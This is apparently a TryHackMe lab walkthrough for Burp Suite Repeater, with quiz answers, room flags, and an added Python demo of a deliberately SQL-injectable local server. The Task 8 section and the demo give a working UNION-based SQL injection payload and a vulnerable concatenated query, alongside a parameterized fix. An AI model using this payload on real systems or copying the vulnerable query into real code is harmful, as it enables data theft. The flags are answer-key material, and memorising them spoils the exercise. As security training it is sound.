Overview
This is a walkthrough of the TryHackMe room "Burp Suite: Repeater".
Task2
Q1.Which sections gives us a more intuitive control over our requests?
A.Inspector
Task3
Q1.Which view will populate when sending a request from the Proxy module to Repeater?
A.Request
Task4
Q1.Which option allows us to visualize the page as it would appear in a web browser?
A.Render
Task5
Q1.Which section in Inspector is specific to POST requests?
A.Body Parameters
Task6
Q1.What is the flag you receive?
Hint.Make sure you leave the two blank lines at the bottom of the request!
FlagAuthorised: True
Add this header to a GET request for the root page (/) in Repeater and send it; the flag is in the response. Repeater sends exactly the bytes shown in the editor, and the blank line after the last header is not optional: it is what tells the server that the header block is complete, so without it the server keeps waiting for more headers instead of answering.
A.THM{Yzg2MWI2ZDhlYzdlNGFiZTUzZTIzMzVi}
Task7
Q1.What is the flag you receive when you cause a 500 error in the endpoint?
Hint.The idea is to enter unexpected inputs to see how the server will react. For example, instead of a number, you could enter a piece of text or a symbol. Alternatively, you could try entering a number greater than the number of products available (e.g. 1000), or a number less than or equal to 0.
/products/-1
Sending an unexpected value for the product id, for example /products/-1, /products/0 or /products/abc, makes the endpoint return a 500 error, and the flag is in that response.
A.THM{N2MzMzFhMTA1MmZiYjA2YWQ4M2ZmMzhl}
Task8
Q1.What is the flag?
/about/0 UNION ALL SELECT notes,null,null,null,null FROM people WHERE id = 1
Send a request with this value in place of the id to obtain the flag. The original query returns five columns, so the injected SELECT supplies five as well (notes plus four nulls) to make the UNION valid, and id = 0 on the left side makes sure no legitimate row comes back, leaving only the injected one. Spaces and other special characters in the request line must be URL-encoded before sending; in Repeater, select the payload and press Ctrl+U to encode it.
A.THM{ZGE3OTUyZGMyMzkwNjJmZjg3Mzk1NjJh}
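The three Repeater steps above (the Task 6 header, the Task 7 unexpected input and the Task 8 UNION payload), reproduced as an added example that is not part of the original walkthrough or of the TryHackMe room. A constructed local server stands in for the target: its routes, schema, product list and the two FLAG{...} placeholder strings are assumptions made for this example. A raw-socket client then sends the request bytes the way Repeater does, including a copy of the Task 6 request with the terminating blank line missing, and a parameterized lookup shows the fix for the Task 8 bug.

```python
import socket
import sqlite3
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the room's backend: the schema, the product list and
# the two FLAG{...} strings are assumptions for this example, not the room's data.
DB = sqlite3.connect(":memory:", check_same_thread=False)
DB.execute("CREATE TABLE people (id INTEGER, name TEXT, role TEXT, bio TEXT, pfp TEXT, notes TEXT)")
DB.execute("INSERT INTO people VALUES (1, 'Alice', 'CEO', 'bio', 'a.png', 'FLAG{constructed-notes-flag}')")
PRODUCTS = {1: "widget", 2: "gadget"}


class Handler(BaseHTTPRequestHandler):
    timeout = 1  # give up on a request whose header block never ends

    def log_message(self, *args):
        pass

    def _send(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        route, _, arg = self.path.lstrip("/").partition("/")
        if self.path == "/":
            # Task 6: the flag is released only when the custom header is present.
            if self.headers.get("FlagAuthorised") == "True":
                return self._send(200, "FLAG{constructed-header-flag}")
            return self._send(200, "welcome")
        if route == "products":
            # Task 7: the id is never validated, so -1, 0, 1000 or text raises
            # and the unhandled exception surfaces as a 500.
            try:
                return self._send(200, PRODUCTS[int(arg)])
            except (ValueError, KeyError) as exc:
                return self._send(500, f"Internal Server Error: {exc!r}")
        if route == "about":
            # Task 8: the id is concatenated into the SQL text (deliberately
            # vulnerable). The query selects five columns, which is why the
            # UNION payload has to supply five as well.
            query = ("SELECT name, role, bio, pfp, id FROM people WHERE id = "
                     + urllib.parse.unquote(arg))
            try:
                rows = DB.execute(query).fetchall()
            except sqlite3.Error as exc:
                return self._send(500, str(exc))
            return self._send(200, "\n".join("|".join(map(str, r)) for r in rows))
        self._send(404, "not found")


def about_safe(raw_id):
    """Hardened lookup: the id is bound as a parameter, so the payload is data, not SQL."""
    return DB.execute("SELECT name, role, bio, pfp, id FROM people WHERE id = ?", (raw_id,)).fetchall()


def start_server():
    srv = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def raw_request(port, request_text):
    """Send the request bytes exactly as written, the way Repeater does.
    Returns (status, body), or (None, "") if the server never answered."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        s.settimeout(3)
        s.sendall(request_text.encode())
        data = b""
        try:
            while chunk := s.recv(4096):
                data += chunk
        except socket.timeout:
            pass
    if not data:
        return None, ""
    status_line, _, rest = data.partition(b"\r\n")
    return int(status_line.split()[1]), rest.split(b"\r\n\r\n", 1)[1].decode()


def run_tasks():
    srv = start_server()
    port = srv.server_address[1]
    host = f"Host: 127.0.0.1:{port}\r\n"
    results = {}
    # Task 6, once without and once with the blank line that ends the header block.
    results["no_blank_line"] = raw_request(port, "GET / HTTP/1.1\r\n" + host + "FlagAuthorised: True\r\n")
    results["task6"] = raw_request(port, "GET / HTTP/1.1\r\n" + host + "FlagAuthorised: True\r\n\r\n")
    # Task 7: an id that does not exist.
    results["task7"] = raw_request(port, "GET /products/-1 HTTP/1.1\r\n" + host + "\r\n")
    # Task 8: the UNION payload; spaces in a request line must be percent-encoded.
    payload = "0 UNION ALL SELECT notes,null,null,null,null FROM people WHERE id = 1"
    results["task8"] = raw_request(port, f"GET /about/{urllib.parse.quote(payload)} HTTP/1.1\r\n" + host + "\r\n")
    srv.shutdown()
    return results
```

Calling run_tasks() returns a dict of (status, body) pairs: the request without the blank line gets no answer at all, the complete one returns the header-gated placeholder, /products/-1 comes back as a 500, and the encoded UNION payload returns the notes column in place of the first column. about_safe(payload) returns no rows, because the bound parameter is compared as a value rather than parsed as SQL.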